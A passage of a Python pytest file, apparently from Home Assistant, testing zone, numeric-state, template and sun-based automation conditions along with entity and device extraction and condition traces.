"value": 101,
},
blocking=True,
)
assert test(hass)
hass.states.async_set("input_number.low", "unknown")
assert not test(hass)
hass.states.async_set("input_number.low", "unavailable")
assert not test(hass)
with pytest.raises(ConditionError):
condition.async_numeric_state(
hass, entity="sensor.temperature", below="input_number.not_exist"
)
with pytest.raises(ConditionError):
condition.async_numeric_state(
hass, entity="sensor.temperature", above="input_number.not_exist"
)
async def test_zone_raises(hass):
"""Test that zone raises ConditionError on errors."""
test = await condition.async_from_config(
hass,
{
"condition": "zone",
"entity_id": "device_tracker.cat",
"zone": "zone.home",
},
)
with pytest.raises(ConditionError, match="no zone"):
condition.zone(hass, zone_ent=None, entity="sensor.any")
with pytest.raises(ConditionError, match="unknown zone"):
test(hass)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
with pytest.raises(ConditionError, match="no entity"):
condition.zone(hass, zone_ent="zone.home", entity=None)
with pytest.raises(ConditionError, match="unknown entity"):
test(hass)
hass.states.async_set(
"device_tracker.cat",
"home",
{"friendly_name": "cat"},
)
with pytest.raises(ConditionError, match="latitude"):
test(hass)
hass.states.async_set(
"device_tracker.cat",
"home",
{"friendly_name": "cat", "latitude": 2.1},
)
with pytest.raises(ConditionError, match="longitude"):
test(hass)
hass.states.async_set(
"device_tracker.cat",
"home",
{"friendly_name": "cat", "latitude": 2.1, "longitude": 1.1},
)
# All okay, now test multiple failed conditions
assert test(hass)
test = await condition.async_from_config(
hass,
{
"condition": "zone",
"entity_id": ["device_tracker.cat", "device_tracker.dog"],
"zone": ["zone.home", "zone.work"],
},
)
with pytest.raises(ConditionError, match="dog"):
test(hass)
with pytest.raises(ConditionError, match="work"):
test(hass)
hass.states.async_set(
"zone.work",
"zoning",
{"name": "work", "latitude": 20, "longitude": 10, "radius": 25000},
)
hass.states.async_set(
"device_tracker.dog",
"work",
{"friendly_name": "dog", "latitude": 20.1, "longitude": 10.1},
)
assert test(hass)
async def test_zone_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"alias": "Zone Condition",
"condition": "zone",
"entity_id": ["device_tracker.person_1", "device_tracker.person_2"],
"zone": "zone.home",
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 20.1, "longitude": 10.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert not test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 20.1, "longitude": 10.1},
)
assert not test(hass)
async def test_multiple_zones(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "zone",
"entity_id": "device_tracker.person",
"zone": ["zone.home", "zone.work"],
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"zone.work",
"zoning",
{"name": "work", "latitude": 20.1, "longitude": 10.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 20.1, "longitude": 10.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 50.1, "longitude": 20.1},
)
assert not test(hass)
async def test_extract_entities():
"""Test extracting entities."""
assert condition.async_extract_entities(
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_2",
"below": 110,
},
{
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_3",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_4",
"below": 110,
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_5",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_6",
"below": 110,
},
],
},
{
"condition": "state",
"entity_id": ["sensor.temperature_7", "sensor.temperature_8"],
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_9", "sensor.temperature_10"],
"below": 110,
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
) == {
"sensor.temperature",
"sensor.temperature_2",
"sensor.temperature_3",
"sensor.temperature_4",
"sensor.temperature_5",
"sensor.temperature_6",
"sensor.temperature_7",
"sensor.temperature_8",
"sensor.temperature_9",
"sensor.temperature_10",
}
async def test_extract_devices():
"""Test extracting devices."""
assert (
condition.async_extract_devices(
{
"condition": "and",
"conditions": [
{"condition": "device", "device_id": "abcd", "domain": "light"},
{"condition": "device", "device_id": "qwer", "domain": "switch"},
{
"condition": "state",
"entity_id": "sensor.not_a_device",
"state": "100",
},
{
"condition": "not",
"conditions": [
{
"condition": "device",
"device_id": "abcd_not",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_not",
"domain": "switch",
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "device",
"device_id": "abcd_or",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_or",
"domain": "switch",
},
],
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
)
== {"abcd", "qwer", "abcd_not", "qwer_not", "abcd_or", "qwer_or"}
)
async def test_condition_template_error(hass):
"""Test invalid template."""
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ undefined.state }}"}
)
with pytest.raises(ConditionError, match="template"):
test(hass)
async def test_condition_template_invalid_results(hass):
"""Test template condition render false with invalid results."""
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 'string' }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 10.1 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 42 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ [1, 2, 3] }}"}
)
assert not test(hass)
def _find_run_id(traces, trace_type, item_id):
"""Find newest run_id for a script or automation."""
for _trace in reversed(traces):
if _trace["domain"] == trace_type and _trace["item_id"] == item_id:
return _trace["run_id"]
return None
async def assert_automation_condition_trace(hass_ws_client, automation_id, expected):
"""Test the result of automation condition."""
id = 1
def next_id():
nonlocal id
id += 1
return id
client = await hass_ws_client()
# List traces
await client.send_json(
{"id": next_id(), "type": "trace/list", "domain": "automation"}
)
response = await client.receive_json()
assert response["success"]
run_id = _find_run_id(response["result"], "automation", automation_id)
# Get trace
await client.send_json(
{
"id": next_id(),
"type": "trace/get",
"domain": "automation",
"item_id": "sun",
"run_id": run_id,
}
)
response = await client.receive_json()
assert response["success"]
trace = response["result"]
assert len(trace["trace"]["condition/0"]) == 1
condition_trace = trace["trace"]["condition/0"][0]["result"]
assert condition_trace == expected
async def test_if_action_before_sunrise_no_offset(hass, hass_ws_client, calls):
"""
Test if action was before sunrise.
Before sunrise is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "before": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise + 1s -> 'before sunrise' not true
now = datetime(2015, 9, 16, 13, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
# now = sunrise -> 'before sunrise' true
now = datetime(2015, 9, 16, 13, 33, 18, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight -> 'before sunrise' true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight - 1s -> 'before sunrise' not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T13:33:18.342542+00:00"},
)
async def test_if_action_after_sunrise_no_offset(hass, hass_ws_client, calls):
"""
Test if action was after sunrise.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {"condition": "sun", "after": SUN_EVENT_SUNRISE},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise - 1s -> 'after sunrise' not true
now = datetime(2015, 9, 16, 13, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
# now = sunrise + 1s -> 'after sunrise' true
now = datetime(2015, 9, 16, 13, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight -> 'after sunrise' not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
# now = local midnight - 1s -> 'after sunrise' true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T13:33:18.342542+00:00"},
)
async def test_if_action_before_sunrise_with_offset(hass, hass_ws_client, calls):
"""
Test if action was before sunrise with offset.
Before sunrise is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": SUN_EVENT_SUNRISE,
"before_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise + 1s + 1h -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunrise + 1h -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 33, 18, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = UTC midnight -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = UTC midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight -> 'before sunrise' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight - 1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 53, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset -1s -> 'before sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 1, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-16T14:33:18.342542+00:00"},
)
async def test_if_action_before_sunset_with_offset(hass, hass_ws_client, calls):
"""
Test if action was before sunset with offset.
Before sunset is true from midnight until sunset, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"before": "sunset",
"before_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = local midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunset + 1s + 1h -> 'before sunset' with offset +1h not true
now = datetime(2015, 9, 17, 2, 53, 46, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunset + 1h -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 2, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = UTC midnight -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 17, 0, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = UTC midnight - 1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 23, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunrise -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 33, 18, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunrise -1s -> 'before sunset' with offset +1h true
now = datetime(2015, 9, 16, 13, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
# now = local midnight-1s -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-17T02:53:44.723614+00:00"},
)
async def test_if_action_after_sunrise_with_offset(hass, hass_ws_client, calls):
"""
Test if action was after sunrise with offset.
After sunrise is true from sunrise until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise - 1s + 1h -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 14, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunrise + 1h -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 14, 33, 58, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = UTC noon -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 12, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = UTC noon - 1s -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 16, 11, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local noon -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 19, 1, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local noon - 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 16, 18, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 53, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 4
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = sunset + 1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 1, 53, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 5
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight-1s -> 'after sunrise' with offset +1h true
now = datetime(2015, 9, 17, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T14:33:18.342542+00:00"},
)
# now = local midnight -> 'after sunrise' with offset +1h not true
now = datetime(2015, 9, 17, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 6
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-17T14:33:57.053037+00:00"},
)
async def test_if_action_after_sunset_with_offset(hass, hass_ws_client, calls):
"""
Test if action was after sunset with offset.
After sunset is true from sunset until midnight, local time.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": "sunset",
"after_offset": "+1:00:00",
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunset - 1s + 1h -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 17, 2, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-17T02:53:44.723614+00:00"},
)
# now = sunset + 1h -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 17, 2, 53, 45, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-17T02:53:44.723614+00:00"},
)
# now = midnight-1s -> 'after sunset' with offset +1h true
now = datetime(2015, 9, 16, 6, 59, 59, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": True, "wanted_time_after": "2015-09-16T02:55:06.099767+00:00"},
)
# now = midnight -> 'after sunset' with offset +1h not true
now = datetime(2015, 9, 16, 7, 0, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_after": "2015-09-17T02:53:44.723614+00:00"},
)
async def test_if_action_before_and_after_during(hass, hass_ws_client, calls):
"""
Test if action was after sunset and before sunrise.
This is true from sunrise until sunset.
"""
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
"condition": {
"condition": "sun",
"after": SUN_EVENT_SUNRISE,
"before": SUN_EVENT_SUNSET,
},
"action": {"service": "test.automation"},
}
},
)
# sunrise: 2015-09-16 06:33:18 local, sunset: 2015-09-16 18:53:45 local
# sunrise: 2015-09-16 13:33:18 UTC, sunset: 2015-09-17 01:53:45 UTC
# now = sunrise - 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 16, 13, 33, 17, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": False,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
# now = sunset + 1s -> 'after sunrise' + 'before sunset' not true
now = datetime(2015, 9, 17, 1, 53, 46, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 0
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{"result": False, "wanted_time_before": "2015-09-17T01:53:44.723614+00:00"},
)
# now = sunrise + 1s -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 13, 33, 19, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 1
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": True,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
# now = sunset - 1s -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 17, 1, 53, 44, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 2
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": True,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
# now = 9AM local -> 'after sunrise' + 'before sunset' true
now = datetime(2015, 9, 16, 16, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.utcnow", return_value=now):
hass.bus.async_fire("test_event")
await hass.async_block_till_done()
assert len(calls) == 3
await assert_automation_condition_trace(
hass_ws_client,
"sun",
{
"result": True,
"wanted_time_before": "2015-09-17T01:53:44.723614+00:00",
"wanted_time_after": "2015-09-16T13:33:18.342542+00:00",
},
)
async def test_if_action_before_sunrise_no_offset_kotzebue(hass, hass_ws_client, calls):
"""
Test if action was before sunrise.
Local timezone: Alaska time
Location: Kotzebue, which has a very skewed local timezone with sunrise
at 7 AM and sunset at 3AM during summer
After sunrise is true from sunrise until midnight, local time.
"""
tz = dt_util.get_time_zone("America/Anchorage")
dt_util.set_default_time_zone(tz)
hass.config.latitude = 66.5
hass.config.longitude = 162.4
await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: {
"id": "sun",
"trigger": {"platform": "event", "event_type": "test_event"},
